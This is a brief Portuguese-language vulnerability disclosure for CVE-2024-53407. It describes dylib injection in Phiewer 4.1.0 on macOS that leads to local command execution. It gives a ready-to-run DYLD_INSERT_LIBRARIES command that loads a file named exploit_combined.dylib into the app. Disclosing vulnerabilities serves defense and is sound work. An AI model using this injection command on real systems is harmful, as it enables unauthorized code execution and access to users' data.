
CVE-2024-53407
No Phiewer 4.1.0, uma injeção de dylib leva à Execução de Comandos, o que permite que atacantes injetem um arquivo dylib, potencialmente levando ao controle remoto e ao acesso não autorizado a dados sensíveis do usuário no MacOs.
use o arquivo .dylib para injetar um comando
DYLD_INSERT_LIBRARIES=exploit_combined.dylib /Applications/Phiewer\ \(lite\).app/Contents/MacOS/Phiewer\ \(lite\)
Execução de Comandos (Local)